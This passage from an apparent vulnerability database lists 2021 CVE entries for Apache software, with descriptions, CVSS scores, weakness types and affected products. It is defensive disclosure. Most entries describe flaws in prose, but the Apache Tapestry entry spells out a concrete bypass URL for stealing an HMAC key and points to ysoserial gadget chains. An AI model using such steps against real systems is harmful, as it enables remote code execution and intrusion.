An XML external entity (XXE) injection vulnerability was discovered in the Nutch DmozParser and is known to affect Nutch versions < 1.18. XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access. This issue is fixed in Apache Nutch 1.18.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,CWE-611,

Products Affected

Vendor Product Version
netapp snap_creator_framework -
apache nutch *
CVE-2021-23926 MEDIUM

The XML parsers used by XMLBeans up to version 2.6.0 did not set the properties needed to protect the user from malicious XML input. Vulnerabilities include possibilities for XML Entity Expansion attacks. Affects XMLBeans up to and including v2.6.0.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-776,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
netapp snap_creator_framework -
oracle peoplesoft_enterprise_peopletools 8.58
debian debian_linux 9.0
oracle middleware_common_libraries_and_tools 12.2.1.3.0
apache xmlbeans *
oracle middleware_common_libraries_and_tools 12.2.1.4.0
netapp snapmanager -
oracle peoplesoft_enterprise_peopletools 8.57
netapp oncommand_unified_manager_core_package -
CVE-2021-23937 MEDIUM

A DNS proxy and possible amplification attack vulnerability in WebClientInfo of Apache Wicket allows an attacker to trigger arbitrary DNS lookups from the server when the X-Forwarded-For header is not properly sanitized. This DNS lookup can be engineered to overload an internal DNS server or to slow down request processing of the Apache Wicket application causing a possible denial of service on either the internal infrastructure or the web application itself. This issue affects Apache Wicket Apache Wicket 9.x version 9.2.0 and prior versions; Apache Wicket 8.x version 8.11.0 and prior versions; Apache Wicket 7.x version 7.17.0 and prior versions and Apache Wicket 6.x version 6.2.0 and later versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache wicket *
CVE-2021-24117 MEDIUM

In Apache Teaclave Rust SGX SDK 1.1.3, a side-channel vulnerability in base64 PEM file decoding allows system-level (administrator) attackers to obtain information about secret RSA keys via a controlled-channel and side-channel attack on software running in isolated environments that can be single stepped, especially Intel SGX.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.9 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 1.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-203,

Products Affected

Vendor Product Version
apache teaclave_sgx_sdk 1.1.3
CVE-2021-24122 MEDIUM

When serving resources from a network location using the NTFS file system, Apache Tomcat versions 10.0.0-M1 to 10.0.0-M9, 9.0.0.M1 to 9.0.39, 8.5.0 to 8.5.59 and 7.0.0 to 7.0.106 were susceptible to JSP source code disclosure in some configurations. The root cause was the unexpected behaviour of the JRE API File.getCanonicalPath() which in turn was caused by the inconsistent behaviour of the Windows API (FindFirstFileW) in some circumstances.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N 2.2 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,CWE-706,

Products Affected

Vendor Product Version
apache tomcat *
oracle agile_plm 9.3.3
debian debian_linux 9.0
apache tomcat 9.0.0
oracle agile_plm 9.3.6
apache tomcat 10.0.0
CVE-2021-25122 MEDIUM

When responding to new h2c connection requests, Apache Tomcat versions 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41 and 8.5.0 to 8.5.61 could duplicate request headers and a limited amount of request body from one request to another meaning user A and user B could both see the results of user A's request.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,CWE-200,

Products Affected

Vendor Product Version
oracle siebel_ui_framework *
oracle database 19c
debian debian_linux 9.0
oracle database 12.2.0.1
oracle instantis_enterprisetrack 17.1
apache tomcat 10.0.0
debian debian_linux 10.0
oracle managed_file_transfer 12.2.1.4.0
oracle communications_instant_messaging_server 10.0.1.5.0
apache tomcat *
oracle communications_cloud_native_core_security_edge_protection_proxy 1.6.0
oracle agile_plm 9.3.3
oracle managed_file_transfer 12.2.1.3.0
oracle database 21c
apache tomcat 9.0.0
oracle agile_plm 9.3.6
oracle mysql_enterprise_monitor *
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
oracle communications_cloud_native_core_policy 1.14.0
oracle graph_server_and_client 21.3.0
oracle graph_server_and_client *
CVE-2021-25329 MEDIUM

The fix for CVE-2020-9484 was incomplete. When using Apache Tomcat 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41, 8.5.0 to 8.5.61 or 7.0.0. to 7.0.107 with a configuration edge case that was highly unlikely to be used, the Tomcat instance was still vulnerable to CVE-2020-9494. Note that both the previously published prerequisites for CVE-2020-9484 and the previously published mitigations for CVE-2020-9484 also apply to this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.0 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.0 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
oracle siebel_ui_framework *
oracle siebel_ui_framework 21.9
oracle database 19c
debian debian_linux 9.0
oracle database 12.2.0.1
oracle instantis_enterprisetrack 17.1
apache tomcat 10.0.0
debian debian_linux 10.0
oracle managed_file_transfer 12.2.1.4.0
oracle communications_instant_messaging_server 10.0.1.5.0
apache tomcat *
oracle communications_cloud_native_core_security_edge_protection_proxy 1.6.0
oracle agile_plm 9.3.3
oracle managed_file_transfer 12.2.1.3.0
oracle database 21c
apache tomcat 9.0.0
oracle agile_plm 9.3.6
oracle mysql_enterprise_monitor *
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
oracle communications_cloud_native_core_policy 1.14.0
oracle graph_server_and_client *
CVE-2021-25640 MEDIUM

In Apache Dubbo prior to 2.6.9 and 2.7.9, the usage of parseURL method will lead to the bypass of white host check which can cause open redirect or SSRF vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,CWE-601,CWE-918,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-25641 HIGH

Each Apache Dubbo server will set a serialization id to tell the clients which serialization protocol it is working on. But for Dubbo versions before 2.7.8 or 2.6.9, an attacker can choose which serialization id the Provider will use by tampering with the byte preamble flags, aka, not following the server's instruction. This means that if a weak deserializer such as the Kryo and FST are somehow in code scope (e.g. if Kryo is somehow a part of a dependency), a remote unauthenticated attacker can tell the Provider to use the weak deserializer, and then proceed to exploit it.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-25642

ZKConfigurationStore which is optionally used by CapacityScheduler of Apache Hadoop YARN deserializes data obtained from ZooKeeper without validation. An attacker having access to ZooKeeper can run arbitrary commands as YARN user by exploiting this. Users should upgrade to Apache Hadoop 2.10.2, 3.2.4, 3.3.4 or later (containing YARN-11126) if ZKConfigurationStore is used.

Products Affected

Vendor Product Version
apache hadoop *
CVE-2021-25646 HIGH

Apache Druid includes the ability to execute user-provided JavaScript code embedded in various types of requests. This functionality is intended for use in high-trust environments, and is disabled by default. However, in Druid 0.20.0 and earlier, it is possible for an authenticated user to send a specially-crafted request that forces Druid to run user-provided JavaScript code for that request, regardless of server configuration. This can be leveraged to execute code on the target machine with the privileges of the Druid server process.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache druid *
CVE-2021-25958 MEDIUM

In Apache Ofbiz, versions v17.12.01 to v17.12.07 implement a try catch exception to handle errors at multiple locations but leaks out sensitive table info which may aid the attacker for further recon. A user can register with a very long password, but when he tries to login with it an exception occurs.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6
vulnerabilitylab@mend.io 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L 3.9 2.5

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-209,CWE-209,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2021-26117 MEDIUM

The optional ActiveMQ LDAP login module can be configured to use anonymous access to the LDAP server. In this case, for Apache ActiveMQ Artemis prior to version 2.16.0 and Apache ActiveMQ prior to versions 5.16.1 and 5.15.14, the anonymous context is used to verify a valid users password in error, resulting in no check on the password.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,CWE-287,

Products Affected

Vendor Product Version
oracle communications_session_report_manager *
oracle communications_session_route_manager *
apache activemq *
debian debian_linux 9.0
apache activemq_artemis *
oracle flexcube_private_banking 12.0.0
netapp oncommand_workflow_automation -
oracle communications_element_manager *
oracle flexcube_private_banking 12.1.0
CVE-2021-26118 MEDIUM

While investigating ARTEMIS-2964 it was found that the creation of advisory messages in the OpenWire protocol head of Apache ActiveMQ Artemis 2.15.0 bypassed policy based access control for the entire session. Production of advisory messages was not subject to access control in error.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,NVD-CWE-Other,

Products Affected

Vendor Product Version
netapp oncommand_workflow_automation -
apache activemq_artemis 2.15.0
CVE-2021-26291 MEDIUM

Apache Maven will follow repositories that are defined in a dependency’s Project Object Model (pom) which may be surprising to some users, resulting in potential risk if a malicious actor takes over that repository or is able to insert themselves into a position to pretend to be that repository. Maven is changing the default behavior in 3.8.1+ to no longer follow http (non-SSL) repository references by default. More details available in the referenced urls. If you are currently using a repository manager to govern the repositories used by your builds, you are unaffected by the risks present in the legacy behavior, and are unaffected by this vulnerability and change to default behavior. See this link for more information about repository management: https://maven.apache.org/repository-management.html

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.1 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N 3.9 5.2

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-346,

Products Affected

Vendor Product Version
oracle goldengate_big_data_and_application_adapters 23.1
oracle financial_services_analytical_applications_infrastructure *
quarkus quarkus *
apache maven *
CVE-2021-26295 HIGH

Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2021-26296 MEDIUM

In the default configuration, Apache MyFaces Core versions 2.2.0 to 2.2.13, 2.3.0 to 2.3.7, 2.3-next-M1 to 2.3-next-M4, and 3.0.0-RC1 use cryptographically weak implicit and explicit cross-site request forgery (CSRF) tokens. Due to that limitation, it is possible (although difficult) for an attacker to calculate a future CSRF token value and to use that value to trick a user into executing unwanted actions on an application.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H 1.6 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,CWE-352,

Products Affected

Vendor Product Version
apache myfaces 3.0.0
netapp oncommand_insight -
apache myfaces *
apache myfaces 2.3
CVE-2021-26461 HIGH

Apache Nuttx Versions prior to 10.1.0 are vulnerable to integer wrap-around in functions malloc, realloc and memalign. This improper memory assignment can lead to arbitrary memory allocation, resulting in unexpected behavior such as a crash or a remote code injection/execution.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-190,CWE-190,

Products Affected

Vendor Product Version
apache nuttx *
CVE-2021-26544 LOW

Livy server version 0.7.0-incubating (only) is vulnerable to a cross site scripting issue in the session name. A malicious user could use this flaw to access logs and results of other users' sessions and run jobs with their privileges. This issue is fixed in Livy 0.7.1-incubating.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,CWE-79,

Products Affected

Vendor Product Version
apache livy 0.7.0-incubating
CVE-2021-26558 MEDIUM

Deserialization of Untrusted Data vulnerability of Apache ShardingSphere-UI allows an attacker to inject outer link resources. This issue affects Apache ShardingSphere-UI Apache ShardingSphere-UI version 4.1.1 and later versions; Apache ShardingSphere-UI versions prior to 5.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,CWE-502,

Products Affected

Vendor Product Version
apache shardingsphere-ui *
CVE-2021-26559 MEDIUM

Improper Access Control on Configurations Endpoint for the Stable API of Apache Airflow allows users with Viewer or User role to get Airflow Configurations including sensitive information even when `[webserver] expose_config` is set to `False` in `airflow.cfg`. This allowed a privilege escalation attack. This issue affects Apache Airflow 2.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,NVD-CWE-Other,

Products Affected

Vendor Product Version
apache airflow 2.0.0
CVE-2021-26690 MEDIUM

Apache HTTP Server versions 2.4.0 to 2.4.46 A specially crafted Cookie header handled by mod_session can cause a NULL pointer dereference and crash, leading to a possible Denial Of Service

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 34
debian debian_linux 9.0
oracle instantis_enterprisetrack 17.1
oracle zfs_storage_appliance_kit 8.8
debian debian_linux 10.0
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
oracle enterprise_manager_ops_center 12.4.0.0
CVE-2021-26691 HIGH

In Apache HTTP Server versions 2.4.0 to 2.4.46 a specially crafted SessionHeader sent by an origin server could cause a heap overflow

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-122,CWE-787,

Products Affected

Vendor Product Version
apache http_server *
debian debian_linux 9.0
oracle instantis_enterprisetrack 17.1
debian debian_linux 10.0
oracle enterprise_manager_ops_center 12.4.0.0
fedoraproject fedora 35
netapp cloud_backup -
fedoraproject fedora 34
oracle secure_backup *
oracle zfs_storage_appliance_kit 8.8
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
CVE-2021-26697 MEDIUM

The lineage endpoint of the deprecated Experimental API was not protected by authentication in Airflow 2.0.0. This allowed unauthenticated users to hit that endpoint. This is low-severity issue as the attacker needs to be aware of certain parameters to pass to that endpoint and even after can just get some metadata about a DAG and a Task. This issue affects Apache Airflow 2.0.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-269,CWE-306,

Products Affected

Vendor Product Version
apache airflow 2.0.0
CVE-2021-26919 MEDIUM

Apache Druid allows users to read data from other database systems using JDBC. This functionality is to allow trusted users with the proper permissions to set up lookups or submit ingestion tasks. The MySQL JDBC driver supports certain properties, which, if left unmitigated, can allow an attacker to execute arbitrary code from a hacker-controlled malicious MySQL server within Druid server processes. This issue was addressed in Apache Druid 0.20.2

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache druid *
CVE-2021-26920 MEDIUM

In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-610,

Products Affected

Vendor Product Version
apache druid *
CVE-2021-27576 MEDIUM

If was found that the NetTest web service can be used to overload the bandwidth of a Apache OpenMeetings server. This issue was addressed in Apache OpenMeetings 6.0.0

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2021-27577 MEDIUM

Incorrect handling of url fragment vulnerability of Apache Traffic Server allows an attacker to poison the cache. This issue affects Apache Traffic Server 7.0.0 to 7.1.12, 8.0.0 to 8.1.1, 9.0.0 to 9.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,CWE-444,

Products Affected

Vendor Product Version
apache traffic_server *
debian debian_linux 8.0
CVE-2021-27578 MEDIUM

Cross Site Scripting vulnerability in markdown interpreter of Apache Zeppelin allows an attacker to inject malicious scripts. This issue affects Apache Zeppelin Apache Zeppelin versions prior to 0.9.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache zeppelin *
CVE-2021-27644 MEDIUM

In Apache DolphinScheduler before 1.3.6 versions, authorized users can use SQL injection in the data source center. (Only applicable to MySQL data source with internal login account password)

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,CWE-89,

Products Affected

Vendor Product Version
apache dolphinscheduler *
CVE-2021-27737 MEDIUM

Apache Traffic Server 9.0.0 is vulnerable to a remote DOS attack on the experimental Slicer plugin.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache traffic_server 9.0.0
CVE-2021-27738 MEDIUM

All request mappings in `StreamingCoordinatorController.java` handling `/kylin/api/streaming_coordinator/*` REST API endpoints did not include any security checks, which allowed an unauthenticated user to issue arbitrary requests, such as assigning/unassigning of streaming cubes, creation/modification and deletion of replica sets, to the Kylin Coordinator. For endpoints accepting node details in HTTP message body, unauthenticated (but limited) server-side request forgery (SSRF) can be achieved. This issue affects Apache Kylin Apache Kylin 3 versions prior to 3.1.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-918,CWE-918,

Products Affected

Vendor Product Version
apache kylin *
CVE-2021-27807 MEDIUM

A carefully crafted PDF file can trigger an infinite loop while loading the file. This issue affects Apache PDFBox version 2.0.22 and prior 2.0.x versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-834,CWE-834,

Products Affected

Vendor Product Version
oracle webcenter_sites 12.2.1.4.0
oracle flexcube_universal_banking *
oracle banking_virtual_account_management 14.2.0
oracle hyperion_infrastructure_technology *
oracle hyperion_financial_reporting 11.2.6.0
oracle communications_session_report_manager *
fedoraproject fedora 32
oracle retail_xstore_point_of_service 20.0.1
fedoraproject fedora 34
oracle primavera_unifier *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle banking_trade_finance_process_management 14.5.0
oracle retail_xstore_point_of_service 16.0.6
oracle primavera_unifier 20.12
oracle primavera_unifier 18.8
oracle retail_xstore_point_of_service 17.0.4
oracle flexcube_universal_banking 14.5.0
apache pdfbox *
oracle retail_xstore_point_of_service 19.0.2
oracle banking_treasury_management 14.5
oracle hyperion_financial_reporting 11.1.2.4
oracle primavera_unifier 19.12
oracle banking_trade_finance_process_management 14.3.0
oracle outside_in_technology 8.5.5
oracle webcenter_sites 12.2.1.3.0
oracle banking_trade_finance_process_management 14.2.0
oracle communications_messaging_server 8.1
oracle retail_customer_management_and_segmentation_foundation 19.0
oracle banking_virtual_account_management 14.3.0
fedoraproject fedora 33
CVE-2021-27850 HIGH

A critical unauthenticated remote code execution vulnerability was found all recent versions of Apache Tapestry. The affected versions include 5.4.5, 5.5.0, 5.6.2 and 5.7.0. The vulnerability I have found is a bypass of the fix for CVE-2019-0195. Recap: Before the fix of CVE-2019-0195 it was possible to download arbitrary class files from the classpath by providing a crafted asset file URL. An attacker was able to download the file `AppModule.class` by requesting the URL `http://localhost:8080/assets/something/services/AppModule.class` which contains a HMAC secret key. The fix for that bug was a blacklist filter that checks if the URL ends with `.class`, `.properties` or `.xml`. Bypass: Unfortunately, the blacklist solution can simply be bypassed by appending a `/` at the end of the URL: `http://localhost:8080/assets/something/services/AppModule.class/` The slash is stripped after the blacklist check and the file `AppModule.class` is loaded into the response. This class usually contains the HMAC secret key which is used to sign serialized Java objects. With the knowledge of that key an attacker can sign a Java gadget chain that leads to RCE (e.g. CommonsBeanUtils1 from ysoserial). Solution for this vulnerability: * For Apache Tapestry 5.4.0 to 5.6.1, upgrade to 5.6.2 or later. * For Apache Tapestry 5.7.0, upgrade to 5.7.1 or later.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-200,CWE-502,CWE-502,

Products Affected

Vendor Product Version
apache tapestry *
CVE-2021-27905 HIGH

The ReplicationHandler (normally registered at "/replication" under a Solr core) in Apache Solr has a "masterUrl" (also "leaderUrl" alias) parameter that is used to designate another ReplicationHandler on another Solr core to replicate index data into the local core. To prevent a SSRF vulnerability, Solr ought to check these parameters against a similar configuration it uses for the "shards" parameter. Prior to this bug getting fixed, it did not. This problem affects essentially all Solr versions prior to it getting fixed in 8.8.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-918,CWE-918,

Products Affected

Vendor Product Version
apache solr *
CVE-2021-27906 MEDIUM

A carefully crafted PDF file can trigger an OutOfMemory-Exception while loading the file. This issue affects Apache PDFBox version 2.0.22 and prior 2.0.x versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-789,NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
oracle webcenter_sites 12.2.1.4.0
oracle banking_corporate_lending_process_management 14.3.0
oracle banking_supply_chain_finance 14.3.0
oracle banking_credit_facilities_process_management 14.3.0
oracle flexcube_universal_banking *
oracle banking_virtual_account_management 14.2.0
oracle hyperion_infrastructure_technology *
oracle hyperion_financial_reporting 11.2.6.0
oracle communications_session_report_manager *
fedoraproject fedora 32
oracle retail_xstore_point_of_service 20.0.1
fedoraproject fedora 34
oracle peoplesoft_enterprise_peopletools 8.58
oracle banking_credit_facilities_process_management 14.5.0
oracle primavera_unifier *
oracle retail_xstore_point_of_service 18.0.3
oracle banking_virtual_account_management 14.5.0
oracle banking_trade_finance_process_management 14.5.0
oracle retail_xstore_point_of_service 16.0.6
oracle banking_supply_chain_finance 14.2.0
oracle primavera_unifier 20.12
oracle primavera_unifier 18.8
oracle retail_xstore_point_of_service 17.0.4
oracle flexcube_universal_banking 14.5.0
apache pdfbox *
oracle retail_xstore_point_of_service 19.0.2
oracle banking_corporate_lending_process_management 14.5.0
oracle banking_treasury_management 14.5
oracle hyperion_financial_reporting 11.1.2.4
oracle banking_corporate_lending_process_management 14.2.0
oracle banking_supply_chain_finance 14.5.0
oracle primavera_unifier 19.12
oracle banking_trade_finance_process_management 14.3.0
oracle outside_in_technology 8.5.5
oracle banking_credit_facilities_process_management 14.2.0
oracle webcenter_sites 12.2.1.3.0
oracle banking_trade_finance_process_management 14.2.0
oracle communications_messaging_server 8.1
oracle retail_customer_management_and_segmentation_foundation 19.0
oracle banking_virtual_account_management 14.3.0
fedoraproject fedora 33
CVE-2021-27907 LOW

Apache Superset up to and including 0.38.0 allowed the creation of a Markdown component on a Dashboard page for describing chart's related information. Abusing this functionality, a malicious user could inject javascript code executing unwanted action in the context of the user's browser. The javascript code will be automatically executed (Stored XSS) when a legitimate user surfs on the dashboard page. The vulnerability is exploitable creating a “div” section and embedding in it a “svg” element with javascript code.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.4 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N 2.3 2.7

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,CWE-79,

Products Affected

Vendor Product Version
apache superset *
CVE-2021-28125 MEDIUM

Apache Superset up to and including 1.0.1 allowed for the creation of an external URL that could be malicious. By not checking user input for open redirects the URL shortener functionality would allow for a malicious user to create a short URL for a dashboard that could convince the user to click the link.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-601,CWE-601,

Products Affected

Vendor Product Version
apache superset *
CVE-2021-28129 MEDIUM

While working on Apache OpenOffice 4.1.8 a developer discovered that the DEB package did not install using root, but instead used a userid and groupid of 500. This both caused issues with desktop integration and could allow a crafted attack on files owned by that user or group if they exist. Users who installed the Apache OpenOffice 4.1.8 DEB packaging should upgrade to the latest version of Apache OpenOffice.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,NVD-CWE-Other,

Products Affected

Vendor Product Version
